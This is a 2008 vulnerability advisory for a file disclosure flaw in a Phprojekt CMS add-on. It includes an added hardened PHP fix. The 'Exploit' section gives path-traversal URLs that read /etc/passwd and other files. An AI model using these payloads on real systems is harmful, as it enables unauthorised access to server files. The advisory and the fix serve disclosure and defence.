
# Title : Content Management System for Phprojekt 0.6.1 File Disclosure Vuln
# Published : 2008-04-27
# Author : Houssamix


--------------------------------------------------------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo ---------------------------------------------------------
--------------------------------------------------------------------------------------------------------------

= Author : HouSSaMix                          
= Script : 	Content Management System for Phprojekt
= version : 0.6.1
= Download : http://www.mariovaldez.net/software/cm_4p/download.php
      			           
							   
= BUG  :  Remote File Disclosure Vulnerability 

 Vulnerable CODE :
~~~~~~~~ graphie.php ~~~~~~~~~~~~~~~~~
readfile ($cm_imgpath . "/t.gif");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The variable $cm_imgpath is not declared in graphie.php before it is used.
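
A hardened form of the readfile() call above, as an added example that is not part of the original advisory and is not the project's own code. It assumes the undeclared variable is reachable from the request because PHP's register_globals (or an equivalent import of request data) is in effect, and that the images sit in an `images` directory beside the script; the constant `CM_IMG_DIR` and the function `cm_safe_image_path()` are hypothetical names.

```php
<?php
// Added example: hardened replacement for the vulnerable line
//     readfile ($cm_imgpath . "/t.gif");
// Assumptions (not from the advisory): the "images" directory location,
// the names CM_IMG_DIR and cm_safe_image_path().

// 1. The base path is a constant assigned by the script itself, so no
//    request parameter can seed it, whatever register_globals is set to.
define('CM_IMG_DIR', __DIR__ . '/images');

// 2. Defence in depth: resolve the final path and confirm it still lies
//    inside the image directory before reading it.
function cm_safe_image_path(string $baseDir, string $name): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;                       // image directory is missing
    }
    // Accept a plain file name only: no slashes, no "..", no NUL bytes.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.(gif|png|jpg)\z/', $name)) {
        return null;
    }
    $full = realpath($base . DIRECTORY_SEPARATOR . $name);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($full === false || strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;                       // missing, or resolves outside base
    }
    return is_file($full) ? $full : null;
}

$path = cm_safe_image_path(CM_IMG_DIR, 't.gif');
if ($path === null) {
    http_response_code(404);
    exit;
}
header('Content-Type: image/gif');
header('X-Content-Type-Options: nosniff');
readfile($path);
```

The same review applies to every other variable in the application that is used before assignment, and the phpinfo.php page mentioned below should be removed from a production install.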

= Exploit :

target.com/cm/graphie.php?cm_imgpath=../.././../[file]
target.com/cm/graphie.php?cm_imgpath=../.././../etc/passwd

= see phpinfo 
target.com/cm/phpinfo.php



= greetz :	V40 - marwen.neo and all muslims Hackers

=================================================================================================================

# www.Syue.com [2008-04-27]